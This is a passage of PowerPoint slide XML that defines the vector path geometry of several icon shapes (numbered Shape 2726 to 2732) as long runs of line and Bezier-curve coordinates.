                  <a:pt x="15709" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="13745"/>
                  <a:pt x="15709" y="15709"/>
                  <a:pt x="15709" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16691" y="12764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4909" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="16691"/>
                  <a:pt x="16691" y="12764"/>
                  <a:pt x="16691" y="12764"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="3927"/>
                  <a:pt x="15709" y="5891"/>
                  <a:pt x="15709" y="5891"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16691" y="2945"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4909" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="6873"/>
                  <a:pt x="16691" y="2945"/>
                  <a:pt x="16691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6" name="Shape 2726"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172341" y="4482539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00" y="13745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16800" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4800" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="17673"/>
                  <a:pt x="4800" y="13745"/>
                  <a:pt x="4800" y="13745"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4800" y="8836"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16800" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="12764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4800" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="12764"/>
                  <a:pt x="4800" y="8836"/>
                  <a:pt x="4800" y="8836"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4800" y="3927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16800" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4800" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="7855"/>
                  <a:pt x="4800" y="3927"/>
                  <a:pt x="4800" y="3927"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3600" y="18655"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18000" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18000" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3600" y="2945"/>
                  <a:pt x="3600" y="18655"/>
                  <a:pt x="3600" y="18655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9600" y="16691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12000" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9600" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9600" y="15709"/>
                  <a:pt x="9600" y="16691"/>
                  <a:pt x="9600" y="16691"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9600" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12000" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9600" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9600" y="5891"/>
                  <a:pt x="9600" y="6873"/>
                  <a:pt x="9600" y="6873"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9600" y="11782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12000" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9600" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9600" y="10800"/>
                  <a:pt x="9600" y="11782"/>
                  <a:pt x="9600" y="1178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7" name="Shape 2727"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="448253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5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0" y="13745"/>
                  <a:pt x="10800" y="14405"/>
                  <a:pt x="10800" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16031"/>
                  <a:pt x="10140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3" y="4424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11483" y="3967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11424" y="3942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6" y="8306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2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90" y="4418"/>
                  <a:pt x="15218" y="4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8" name="Shape 2728"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="501579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7318"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="6949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="4956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="5324"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="5324"/>
                  <a:pt x="14727" y="7318"/>
                  <a:pt x="14727" y="7318"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9327" y="16691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8345" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7532" y="16691"/>
                  <a:pt x="6873" y="16031"/>
                  <a:pt x="6873" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="14406"/>
                  <a:pt x="7532" y="13745"/>
                  <a:pt x="8345" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9327" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10141" y="13745"/>
                  <a:pt x="10800" y="14406"/>
                  <a:pt x="10800" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="16031"/>
                  <a:pt x="10141" y="16691"/>
                  <a:pt x="9327" y="16691"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15218" y="4418"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15192" y="4418"/>
                  <a:pt x="15170" y="4429"/>
                  <a:pt x="15145" y="4433"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15144" y="4424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11483" y="3967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11424" y="3941"/>
                  <a:pt x="11359" y="3927"/>
                  <a:pt x="11291" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11275" y="3927"/>
                  <a:pt x="11261" y="3935"/>
                  <a:pt x="11245" y="3937"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11216" y="3933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11218" y="3942"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10983" y="3979"/>
                  <a:pt x="10800" y="4173"/>
                  <a:pt x="10800" y="4418"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="13266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10389" y="12955"/>
                  <a:pt x="9882" y="12764"/>
                  <a:pt x="9327" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8345" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6990" y="12764"/>
                  <a:pt x="5891" y="13862"/>
                  <a:pt x="5891" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="16574"/>
                  <a:pt x="6990" y="17673"/>
                  <a:pt x="8345" y="17673"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9327" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10683" y="17673"/>
                  <a:pt x="11782" y="16574"/>
                  <a:pt x="11782" y="15218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11782" y="7901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15027" y="8307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15085" y="8332"/>
                  <a:pt x="15150" y="8345"/>
                  <a:pt x="15218" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15234" y="8345"/>
                  <a:pt x="15248" y="8338"/>
                  <a:pt x="15264" y="8336"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15293" y="8340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15291" y="8331"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15526" y="8294"/>
                  <a:pt x="15709" y="8100"/>
                  <a:pt x="15709" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15709" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="4638"/>
                  <a:pt x="15489" y="4418"/>
                  <a:pt x="15218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29" name="Shape 2729"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="501579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7318"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14727" y="6949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14727" y="4956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="5324"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="5324"/>
                  <a:pt x="17673" y="7318"/>
                  <a:pt x="17673" y="7318"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12273" y="16691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11291" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10477" y="16691"/>
                  <a:pt x="9818" y="16031"/>
                  <a:pt x="9818" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9818" y="14406"/>
                  <a:pt x="10477" y="13745"/>
                  <a:pt x="11291" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12273" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13086" y="13745"/>
                  <a:pt x="13745" y="14406"/>
                  <a:pt x="13745" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="16031"/>
                  <a:pt x="13086" y="16691"/>
                  <a:pt x="12273" y="16691"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18164" y="4418"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18138" y="4418"/>
                  <a:pt x="18115" y="4429"/>
                  <a:pt x="18091" y="4433"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18089" y="4424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14428" y="3967"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14369" y="3941"/>
                  <a:pt x="14305" y="3927"/>
                  <a:pt x="14236" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14220" y="3927"/>
                  <a:pt x="14206" y="3935"/>
                  <a:pt x="14191" y="3937"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14162" y="3933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14163" y="3942"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13929" y="3979"/>
                  <a:pt x="13745" y="4173"/>
                  <a:pt x="13745" y="4418"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13745" y="13266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13335" y="12955"/>
                  <a:pt x="12828" y="12764"/>
                  <a:pt x="12273" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9935" y="12764"/>
                  <a:pt x="8836" y="13862"/>
                  <a:pt x="8836" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="16574"/>
                  <a:pt x="9935" y="17673"/>
                  <a:pt x="11291" y="17673"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12273" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13629" y="17673"/>
                  <a:pt x="14727" y="16574"/>
                  <a:pt x="14727" y="15218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14727" y="7901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17972" y="8307"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18031" y="8332"/>
                  <a:pt x="18095" y="8345"/>
                  <a:pt x="18164" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18180" y="8345"/>
                  <a:pt x="18194" y="8338"/>
                  <a:pt x="18210" y="8336"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18238" y="8340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18237" y="8331"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18471" y="8294"/>
                  <a:pt x="18655" y="8100"/>
                  <a:pt x="18655" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="4909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="4638"/>
                  <a:pt x="18434" y="4418"/>
                  <a:pt x="18164" y="4418"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="10800" y="10309"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="10038"/>
                  <a:pt x="10580" y="9818"/>
                  <a:pt x="10309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lnTo>
                  <a:pt x="10309" y="10800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="10800"/>
                  <a:pt x="10800" y="10580"/>
                  <a:pt x="10800" y="10309"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4418" y="6873"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10309" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="6873"/>
                  <a:pt x="10800" y="6653"/>
                  <a:pt x="10800" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="6110"/>
                  <a:pt x="10580" y="5891"/>
                  <a:pt x="10309" y="5891"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4418" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4147" y="5891"/>
                  <a:pt x="3927" y="6110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moveTo>
                  <a:pt x="4418" y="8836"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10309" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10580" y="8836"/>
                  <a:pt x="10800" y="8617"/>
                  <a:pt x="10800" y="8345"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="8074"/>
                  <a:pt x="10580" y="7855"/>
                  <a:pt x="10309" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4418" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4147" y="7855"/>
                  <a:pt x="3927" y="8074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0" name="Shape 2730"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="501579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691" y="5988"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8836" y="7734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8836" y="5794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="4048"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="4048"/>
                  <a:pt x="16691" y="5988"/>
                  <a:pt x="16691" y="5988"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15218" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14236" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13423" y="15709"/>
                  <a:pt x="12764" y="15050"/>
                  <a:pt x="12764" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="13423"/>
                  <a:pt x="13423" y="12764"/>
                  <a:pt x="14236" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15218" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16032" y="12764"/>
                  <a:pt x="16691" y="13423"/>
                  <a:pt x="16691" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="15050"/>
                  <a:pt x="16032" y="15709"/>
                  <a:pt x="15218" y="15709"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6382" y="17673"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5400" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4586" y="17673"/>
                  <a:pt x="3927" y="17014"/>
                  <a:pt x="3927" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="15387"/>
                  <a:pt x="4586" y="14727"/>
                  <a:pt x="5400" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6382" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7195" y="14727"/>
                  <a:pt x="7855" y="15387"/>
                  <a:pt x="7855" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="17014"/>
                  <a:pt x="7195" y="17673"/>
                  <a:pt x="6382" y="17673"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17182" y="2945"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17148" y="2945"/>
                  <a:pt x="17119" y="2958"/>
                  <a:pt x="17088" y="2965"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17086" y="2955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8249" y="4919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8251" y="4928"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8027" y="4973"/>
                  <a:pt x="7855" y="5162"/>
                  <a:pt x="7855" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7855" y="14248"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7444" y="13937"/>
                  <a:pt x="6937" y="13745"/>
                  <a:pt x="6382" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5400" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4044" y="13745"/>
                  <a:pt x="2945" y="14844"/>
                  <a:pt x="2945" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="17556"/>
                  <a:pt x="4044" y="18655"/>
                  <a:pt x="5400" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6382" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7737" y="18655"/>
                  <a:pt x="8836" y="17556"/>
                  <a:pt x="8836" y="16200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8836" y="8739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="6994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="12284"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16280" y="11974"/>
                  <a:pt x="15773" y="11782"/>
                  <a:pt x="15218" y="11782"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14236" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12881" y="11782"/>
                  <a:pt x="11782" y="12881"/>
                  <a:pt x="11782" y="14236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="15592"/>
                  <a:pt x="12881" y="16691"/>
                  <a:pt x="14236" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15218" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16573" y="16691"/>
                  <a:pt x="17673" y="15592"/>
                  <a:pt x="17673" y="14236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="3436"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="3165"/>
                  <a:pt x="17453" y="2945"/>
                  <a:pt x="17182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1" name="Shape 2731"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="5028496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74" y="6862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18121" y="9450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17427" y="8686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19780" y="6098"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19869" y="6000"/>
                  <a:pt x="19992" y="5940"/>
                  <a:pt x="20127" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20398" y="5940"/>
                  <a:pt x="20618" y="6182"/>
                  <a:pt x="20618" y="6480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="6629"/>
                  <a:pt x="20563" y="6764"/>
                  <a:pt x="20474" y="6862"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="21600" y="6480"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="5586"/>
                  <a:pt x="20941" y="4860"/>
                  <a:pt x="20127" y="4860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19720" y="4860"/>
                  <a:pt x="19352" y="5041"/>
                  <a:pt x="19086" y="5335"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6813" y="18835"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6547" y="19128"/>
                  <a:pt x="6382" y="19533"/>
                  <a:pt x="6382" y="19980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="20874"/>
                  <a:pt x="7041" y="21600"/>
                  <a:pt x="7855" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8262" y="21600"/>
                  <a:pt x="8630" y="21419"/>
                  <a:pt x="8896" y="21125"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21169" y="7625"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21435" y="7332"/>
                  <a:pt x="21600" y="6927"/>
                  <a:pt x="21600" y="6480"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20127" y="14040"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="14040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="11918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15744" y="15120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20127" y="15120"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20398" y="15120"/>
                  <a:pt x="20618" y="15362"/>
                  <a:pt x="20618" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="15958"/>
                  <a:pt x="20398" y="16200"/>
                  <a:pt x="20127" y="16200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14762" y="16200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13780" y="17280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20127" y="17280"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20941" y="17280"/>
                  <a:pt x="21600" y="16554"/>
                  <a:pt x="21600" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="14766"/>
                  <a:pt x="20941" y="14040"/>
                  <a:pt x="20127" y="14040"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7820" y="16200"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1473" y="16200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1202" y="16200"/>
                  <a:pt x="982" y="15958"/>
                  <a:pt x="982" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="15362"/>
                  <a:pt x="1202" y="15120"/>
                  <a:pt x="1473" y="15120"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8802" y="15120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12729" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="1080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="1080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="5362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="4282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="540"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="242"/>
                  <a:pt x="18434" y="0"/>
                  <a:pt x="18164" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3436" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3166" y="0"/>
                  <a:pt x="2945" y="242"/>
                  <a:pt x="2945" y="540"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2945" y="14040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473" y="14040"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="659" y="14040"/>
                  <a:pt x="0" y="14766"/>
                  <a:pt x="0" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="16554"/>
                  <a:pt x="659" y="17280"/>
                  <a:pt x="1473" y="17280"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6838" y="17280"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6838" y="17280"/>
                  <a:pt x="7820" y="16200"/>
                  <a:pt x="7820" y="162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2" name="Shape 2732"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="5091979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6" y="19413"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13945" y="13593"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14130" y="12747"/>
                  <a:pt x="14236" y="11802"/>
                  <a:pt x="14236" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="9799"/>
                  <a:pt x="14130" y="8854"/>
                  <a:pt x="13945" y="8007"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19236" y="2187"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20007" y="2465"/>
                  <a:pt x="20618" y="6209"/>
                  <a:pt x="20618" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="15392"/>
                  <a:pt x="20007" y="19136"/>
                  <a:pt x="19236" y="19413"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11291" y="15120"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10309" y="15120"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9225" y="15120"/>
                  <a:pt x="8345" y="13186"/>
                  <a:pt x="8345" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
